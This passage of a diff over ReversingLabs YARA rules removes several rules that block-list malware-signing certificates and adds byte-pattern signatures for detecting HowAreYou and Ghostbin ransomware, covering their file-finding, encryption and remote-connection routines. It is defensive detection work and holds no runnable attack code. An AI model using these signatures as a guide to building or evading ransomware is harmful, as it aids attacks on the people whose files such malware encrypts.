+            24 E8 ?? ?? ?? ?? 89 74 24 ?? 89 3C 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 44
+            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 83 EC
+            ?? 83 F8 ?? 89 C3 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 89 7C 24 ?? 89 34 24 EB ?? 8D
+            BD ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? C7 44 24 ?? ?? ??
+            ?? ?? 89 1C 24 89 44 24 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 85 C0 75 ?? 89
+            1C 24 E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8
+            ?? ?? ?? ?? EB ?? F7 D8 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ??
+            89 1C 24 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 83 EC ?? BA ?? ?? ?? ?? C7 04 24 ?? ?? ??
+            ?? B8 ?? ?? ?? ?? 89 F1 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89
+            74 24 ?? 89 1C 24 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 83 EC ??
+            FF 8D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Umbrella LLC" and pe.signatures [ i ] . serial == "12:49:aa:2a:da:49:67:96:9b:71:ce:63:bf:18:7c:38" and 1599181200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enum_resources ) and ( $find_files ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_D59A05955A4A421500F9561Ce983Aac4 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Howareyou : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects HowAreYou ransomware."
 		author = "ReversingLabs"
-		id = "088f0f98-328b-50fa-b1e4-1d80023b3c09"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "998fbebe-099d-5779-ad4a-91b7b6c8ad6b"
+		date = "2021-06-14"
+		modified = "2021-06-14"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6216-L6234"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b7ed87a03f20872669369cc3cad4eae40ba597f06222194bd67262c094083ec1"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.HowAreYou.yara#L1-L205"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "90568365aac61d120886f9efa9822ccc23df79a1a55e522c81db6e77477c4f04"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "HowAreYou"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Olymp LLC" and ( pe.signatures [ i ] . serial == "00:d5:9a:05:95:5a:4a:42:15:00:f9:56:1c:e9:83:aa:c4" or pe.signatures [ i ] . serial == "d5:9a:05:95:5a:4a:42:15:00:f9:56:1c:e9:83:aa:c4" ) and 1601895290 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_539015999E304A5952985A994F9C3A53 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "ccb4da10-3178-5d8f-be17-9c689e794418"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6236-L6252"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "feeb1710bd5b048c689a2e45575529624cd1622dcc73db8fe7de6c133fdc5698"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$remote_connection_p1 = {
+            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? 8B 05 ??
+            ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 85 C9 0F 85 ?? ?? ?? ?? 8D 0D ?? ??
+            ?? ?? 89 08 8B 05 ?? ?? ?? ?? 8D 0D ?? ?? ?? ?? 89 0C 24 89 44 24 ?? E8 ?? ?? ?? ??
+            8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 8B 6C 24 ?? 85 C9 74 ?? 74 ?? 8B 49
+            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? 8D 44 24
+            ?? 89 04 24 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 E8 ??
+            ?? ?? ?? 83 C4 ?? C3 89 54 24 ?? 89 5C 24 ?? 89 6C 24 ?? 8D 05 ?? ?? ?? ?? 89 04 24
+            C7 44 24 ?? ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ??
+            E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 85 D2 74 ?? 74 ?? 8B
+            4A ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? 8D 05
+            ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 89 44 24 ?? C7 44 24 ?? ??
+            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 89 D1
+        }
+		$remote_connection_p2 = {
+            EB ?? 89 4C 24 ?? 89 5C 24 ?? 84 03 89 4C 24 ?? C7 04 24 ?? ?? ?? ?? 8D 43 ?? 89 44
+            24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 8B 48 ?? 8B 54 24 ?? 89 54
+            24 ?? 8B 54 24 ?? 89 54 24 ?? 8B 54 24 ?? 89 54 24 ?? 8B 54 24 ?? 89 14 24 FF D1 8B
+            44 24 ?? 8B 4C 24 ?? 85 C0 74 ?? 74 ?? 8B 40 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? 89 44 24 ?? 89 4C 24 ?? 8D 05 ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ??
+            ?? 8D 44 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 8D 05 ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C
+            24 ?? 8B 5B ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 8B 44 24 ?? 89 04 24 FF D3 90 E8
+            ?? ?? ?? ?? 83 C4 ?? C3 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 89 04 24 8D 05 ?? ?? ?? ?? 89
+            44 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9
+        }
+		$find_files_p1 = {
+            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 8D 44 24 ?? 3B 41 ?? 0F 86 ?? ?? ?? ?? 81 EC
+            ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 8B 8C 24 ?? ?? ?? ?? 89 4C 24 ?? E8 ?? ??
+            ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 85 C9 0F 85 ?? ?? ?? ?? 89 54
+            24 ?? 89 9C 24 ?? ?? ?? ?? 31 C0 31 C9 31 ED 31 F6 EB ?? 8B 7C 24 ?? 47 8B 9C 24 ??
+            ?? ?? ?? 89 CD 89 C6 89 F8 89 D1 8B 54 24 ?? 39 D0 0F 8D ?? ?? ?? ?? 89 44 24 ?? 89
+            4C 24 ?? 89 AC 24 ?? ?? ?? ?? 89 74 24 ?? 8D 0C C3 8B 11 89 94 24 ?? ?? ?? ?? 8B 49
+            ?? 89 8C 24 ?? ?? ?? ?? 8B 6A ?? 89 0C 24 FF D5 0F B6 44 24 ?? 84 C0 0F 84 ?? ?? ??
+            ?? 8B 84 24 ?? ?? ?? ?? 8B 40 ?? 8B 8C 24 ?? ?? ?? ?? 89 0C 24 FF D0 8B 44 24 ?? 8B
+            4C 24 ?? 89 0C 24 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 85 C0 0F 86 ??
+            ?? ?? ?? 0F B6 11 80 FA ?? 75 ?? 8B 44 24 ?? 8B 8C 24 ?? ?? ?? ?? 8B 54 24 ?? E9 ??
+            ?? ?? ?? 80 FA ?? 74 ?? 89 44 24 ?? 89 8C 24 ?? ?? ?? ?? 89 0C 24 89 44 24 ?? 8B 15
+            ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 89 6C 24 ?? 89 5C 24 ?? 89 54 24 ??
+            E8 ?? ?? ?? ?? 0F B6 44 24 ?? 84 C0 74 ?? 8B 44 24 ?? 8B 8C 24 ?? ?? ?? ?? 8B 54 24
+            ?? E9 ?? ?? ?? ?? 8B 44 24 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B 11
+        }
+		$find_files_p2 = {
+            81 FA ?? ?? ?? ?? 75 ?? 0F B7 51 ?? 66 81 FA ?? ?? 75 ?? 0F B6 51 ?? 80 FA ?? 0F 84
+            ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 89 54 24 ?? 8B 9C 24 ?? ?? ??
+            ?? 89 5C 24 ?? 8D 2D ?? ?? ?? ?? 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 89
+            44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 04 24 89 4C 24 ?? E8 ?? ?? ?? ??
+            8B 44 24 ?? 8D 48 ?? 8B 54 24 ?? 8B 5C 24 ?? 8B 6C 24 ?? 39 E9 7F ?? 8B B4 24 ?? ??
+            ?? ?? 8D 7C C6 ?? 89 1F 8D 04 C6 8B 1D ?? ?? ?? ?? 85 DB 75 ?? 89 10 89 E8 89 CA 89
+            F1 E9 ?? ?? ?? ?? 89 B4 24 ?? ?? ?? ?? 89 4C 24 ?? 89 6C 24 ?? 89 04 24 89 54 24 ??
+            E8 ?? ?? ?? ?? 8B 4C 24 ?? 8B 6C 24 ?? 8B B4 24 ?? ?? ?? ?? EB ?? 89 94 24 ?? ?? ??
+            ?? 89 5C 24 ?? 8D 15 ?? ?? ?? ?? 89 14 24 8B 9C 24 ?? ?? ?? ?? 89 5C 24 ?? 89 44 24
+            ?? 89 6C 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 74 24 ?? 8B 44 24 ?? 8B 6C 24 ?? 8D 48
+            ?? 8B 44 24 ?? 8B 94 24 ?? ?? ?? ?? 8B 5C 24 ?? E9 ?? ?? ?? ?? 8D 54 24 ?? 89 14 24
+            8B 94 24 ?? ?? ?? ?? 89 54 24 ?? 8B 9C 24 ?? ?? ?? ?? 89 5C 24 ?? 8D 2D ?? ?? ?? ??
+            89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24
+            ?? 8B 4C 24 ?? 89 0C 24 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 8C 24 ?? ?? ?? ??
+            E9 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8B 40 ?? 8B
+        }
+		$find_files_p3 = {
+            8C 24 ?? ?? ?? ?? 89 0C 24 FF D0 8B 44 24 ?? 8B 4C 24 ?? 89 0C 24 89 44 24 ?? E8 ??
+            ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 89 04 24 89 4C 24 ?? 8B 15
+            ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 89 6C 24 ?? 89 5C 24 ?? 89 54 24 ??
+            E8 ?? ?? ?? ?? 0F B6 44 24 ?? 84 C0 74 ?? 8B 44 24 ?? 8B 8C 24 ?? ?? ?? ?? 8B 54 24
+            ?? E9 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 8B 4C 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 44
+            24 ?? 89 84 24 ?? ?? ?? ?? 8B 4C 24 ?? 89 4C 24 ?? C7 04 24 ?? ?? ?? ?? 8B 94 24 ??
+            ?? ?? ?? 89 54 24 ?? 8B 9C 24 ?? ?? ?? ?? 89 5C 24 ?? 8D 2D ?? ?? ?? ?? 89 6C 24 ??
+            C7 44 24 ?? ?? ?? ?? ?? 8B 74 24 ?? 89 74 24 ?? 8B 74 24 ?? 89 74 24 ?? E8 ?? ?? ??
+            ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B 94 24 ?? ?? ?? ?? 89 14 24 8B
+            5C 24 ?? 89 5C 24 ?? 8B 2D ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 89 6C 24
+            ?? 89 74 24 ?? 89 7C 24 ?? E8 ?? ?? ?? ?? 0F B6 44 24 ?? 84 C0 0F 84 ?? ?? ?? ?? 8B
+            84 24 ?? ?? ?? ?? 85 C0 0F 86 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 0F B6 08 83 C1 ?? 88
+            4C 24 ?? 0F B6 08 83 C1 ?? 88 4C 24 ?? 8D 0D ?? ?? ?? ?? 89 0C 24 8B 15 ?? ?? ?? ??
+            89 54 24 ?? 8D 54 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 48 ?? 8D 51 ?? 8B
+            18 8B 40 ?? 39 C2 0F 8F ?? ?? ?? ?? 89 9C 24 ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? 8D
+        }
+		$find_files_p4 = {
+            6C CB ?? 8B 74 24 ?? 89 75 ?? 8B 2D ?? ?? ?? ?? 8D 0C CB 85 ED 75 ?? 8B 6C 24 ?? 89
+            29 8D 05 ?? ?? ?? ?? 89 04 24 8B 0D ?? ?? ?? ?? 89 4C 24 ?? 8D 4C 24 ?? 89 4C 24 ??
+            E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 48 ?? 8B 4C 24 ?? 89 48 ?? 8B 0D ?? ?? ??
+            ?? 85 C9 75 ?? 8B 8C 24 ?? ?? ?? ?? 89 08 8B 6C 24 ?? 8B 4C 24 ?? 8B B4 24 ?? ?? ??
+            ?? E9 ?? ?? ?? ?? 89 04 24 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? EB ?? 89
+            0C 24 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? EB ?? 89 4C 24 ?? 8D 2D ?? ?? ?? ?? 89
+            2C 24 89 5C 24 ?? 89 4C 24 ?? 89 44 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 8B
+            44 24 ?? 8B 4C 24 ?? 8D 50 ?? 89 C8 8B 4C 24 ?? E9 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ??
+            89 04 24 8B 44 24 ?? 89 44 24 ?? 8B 05 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 15 ?? ?? ??
+            ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 0F B6 44 24 ?? 84 C0 74 ?? 8B
+            44 24 ?? 8B 8C 24 ?? ?? ?? ?? 8B 54 24 ?? E9 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 85 C0
+            0F 86 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 0F B6 08 88 4C 24 ?? 0F B6 08 88 4C 24 ?? 8D
+        }
+		$find_files_p5 = {
+            0D ?? ?? ?? ?? 89 0C 24 8B 15 ?? ?? ?? ?? 89 54 24 ?? 8D 54 24 ?? 89 54 24 ?? E8 ??
+            ?? ?? ?? 8B 44 24 ?? 8B 48 ?? 8D 51 ?? 8B 18 8B 40 ?? 39 C2 0F 8F ?? ?? ?? ?? 89 9C
+            24 ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? 8D 6C CB ?? 8B 74 24 ?? 89 75 ?? 8B 2D ?? ??
+            ?? ?? 8D 0C CB 85 ED 75 ?? 8B 6C 24 ?? 89 29 8D 05 ?? ?? ?? ?? 89 04 24 8B 0D ?? ??
+            ?? ?? 89 4C 24 ?? 8D 4C 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89
+            48 ?? 8B 4C 24 ?? 89 48 ?? 8B 0D ?? ?? ?? ?? 85 C9 75 ?? 8B 8C 24 ?? ?? ?? ?? 89 08
+            E9 ?? ?? ?? ?? 89 04 24 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ??
+            ?? 89 0C 24 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? EB ?? 89 4C 24 ?? 8D 2D ?? ?? ??
+            ?? 89 2C 24 89 5C 24 ?? 89 4C 24 ?? 89 44 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24
+            ?? 8B 44 24 ?? 8B 4C 24 ?? 8D 50 ?? 89 C8 8B 4C 24 ?? E9 ?? ?? ?? ?? 89 AC 24 ?? ??
+            ?? ?? 89 8C 24 ?? ?? ?? ?? 89 B4 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7
+            84 24 ?? ?? ?? ?? ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
+            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 89 8C 24 ?? ?? ??
+            ?? 89 84 24 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 E8
+        }
+		$encrypt_files_p1 = {
+            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 8D 44 24 ?? 3B 41 ?? 0F 86 ?? ?? ?? ?? 81 EC
+            ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ??
+            ?? ?? ?? ?? 8B 40 ?? 89 04 24 8D 84 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 84
+            24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8D 15 ?? ?? ?? ?? 39 CA 0F 85 ?? ?? ?? ?? 8B 48
+            ?? 89 4C 24 ?? 8B 00 89 84 24 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? 89 4C 24
+            ?? 8B 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 89 54 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 44
+            24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? C6 44 24 ?? ?? C7 84 24 ?? ?? ?? ?? ?? ??
+            ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 8D 54 24 ?? 89 54 24 ?? 8B 94 24 ?? ?? ?? ??
+            89 54 24 ?? 8B 5C 24 ?? 89 5C 24 ?? 8D AC 24 ?? ?? ?? ?? 89 6C 24 ?? 89 4C 24 ?? 89
+            44 24 ?? C7 04 24 ?? ?? ?? ?? 8D 2D ?? ?? ?? ?? 89 6C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F
+            85 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 8B 4C 24 ?? 89 4C 24 ?? C7 44 24 ?? ??
+            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ??
+            85 D2 0F 85 ?? ?? ?? ?? 89 44 24 ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? 8D 0D ?? ?? ??
+            ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 8B 44 24
+            ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 85 D2 0F 85 ?? ??
+            ?? ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? E8
+        }
+		$encrypt_files_p2 = {
+            85 C0 0F 85 ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ?? ?? C7 44 24
+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B 54
+            24 ?? 89 54 24 ?? 89 14 24 89 4C 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C
+            24 ?? 85 C9 0F 85 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 15 ?? ?? ?? ??
+            89 14 24 89 4C 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ??
+            8B 5C 24 ?? 85 C9 0F 85 ?? ?? ?? ?? 89 1C 24 89 54 24 ?? 8B 44 24 ?? 89 44 24 ?? 8B
+            4C 24 ?? 89 4C 24 ?? 8B 54 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ??
+            8B 4C 24 ?? 89 4C 24 ?? 8D 15 ?? ?? ?? ?? 89 14 24 8B 15 ?? ?? ?? ?? 8B 1D ?? ?? ??
+            ?? 8B 2D ?? ?? ?? ?? 89 54 24 ?? 89 5C 24 ?? 89 6C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ??
+            89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8D 15 ?? ?? ?? ?? 89 14 24 C7 44 24 ?? ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 84 24 ?? ?? ?? ?? 8B 4C 24
+            ?? 89 4C 24 ?? 8B 54 24 ?? 89 54 24 ?? 8B 5C 24 ?? 89 1C 24 8B 6C 24 ?? 89 6C 24 ??
+            8B 6C 24 ?? 89 6C 24 ?? 8B 6C 24 ?? 89 6C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24
+            ?? 85 C0 0F 85 ?? ?? ?? ?? 31 C0 EB ?? 8B 4C 24 ?? 8B 54 24 ?? 8D 04 0A 89 44 24 ??
+            8B 4C 24 ?? 89 0C 24 8B 94 24 ?? ?? ?? ?? 89 54 24 ?? 8B 5C 24 ?? 89 5C 24 ?? 8B 6C
+            24 ?? 89 6C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B
+            54 24 ?? 89 54 24 ?? 85 C9 74 ?? 8B 1D ?? ?? ?? ?? 39 D9 0F 85 ?? ?? ?? ?? 89 0C 24
+        }
+		$encrypt_files_p3 = {
+            89 54 24 ?? 8B 05 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 0F B6 44 24 ?? 84 C0 0F 84
+            ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 04 24 8B 4C 24 ?? 89 4C 24 ?? 89 4C 24 ?? E8 ?? ??
+            ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 8B 6C 24 ?? 39 EB 0F 87 ?? ??
+            ?? ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 8B 74 24 ?? 8B 7E ?? 89 44 24 ?? 89 4C 24
+            ?? 89 54 24 ?? 8B B4 24 ?? ?? ?? ?? 89 74 24 ?? 89 5C 24 ?? 89 6C 24 ?? 8B 6C 24 ??
+            89 2C 24 FF D7 8B 44 24 ?? 8B 48 ?? 8B 54 24 ?? 89 54 24 ?? 8B 5C 24 ?? 89 5C 24 ??
+            8B 6C 24 ?? 89 6C 24 ?? 8B 74 24 ?? 89 34 24 FF D1 8B 44 24 ?? 89 04 24 8B 4C 24 ??
+            89 4C 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B 4C 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 44 24
+            ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 4C 24 ?? 39 C1 0F 85 ?? ?? ?? ?? 89
+            0C 24 8B 44 24 ?? 89 44 24 ?? 8B 05 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 0F B6 44
+            24 ?? 84 C0 0F 84 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 8B 44 24 ?? 89 44 24 ??
+            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24
+            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 44 24 ?? B9 ?? ?? ?? ?? F7 E9 8B 44 24 ?? 01 C2 C1 F8 ?? C1 FA ?? 29 C2 89 D0
+            89 D3 F7 E9 8D 04 13 C1 F8 ?? C1 FB ?? 29 D8 83 C0 ?? 89 44 24 ?? 31 C9 EB ?? 8B 54
+            24 ?? 8D 4A ?? 8B 44 24 ?? 39 C1 7D ?? 89 4C 24 ?? 8B 44 24 ?? 89 04 24 8D 0D ?? ??
+            ?? ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 74 ?? 90
+            E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 90
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Service lab LLC" and pe.signatures [ i ] . serial == "53:90:15:99:9e:30:4a:59:52:98:5a:99:4f:9c:3a:53" and 1599181200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0B1926A5E8Ae50A0Efa504F005F93869 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Ghostbin : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Ghostbin ransomware."
 		author = "ReversingLabs"
-		id = "ce437144-0f99-5c41-8d15-edeceb34de4d"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "4d576854-7a30-527d-9a7a-f22018183540"
+		date = "2021-09-06"
+		modified = "2021-09-06"
 		reference = "ReversingLabs"
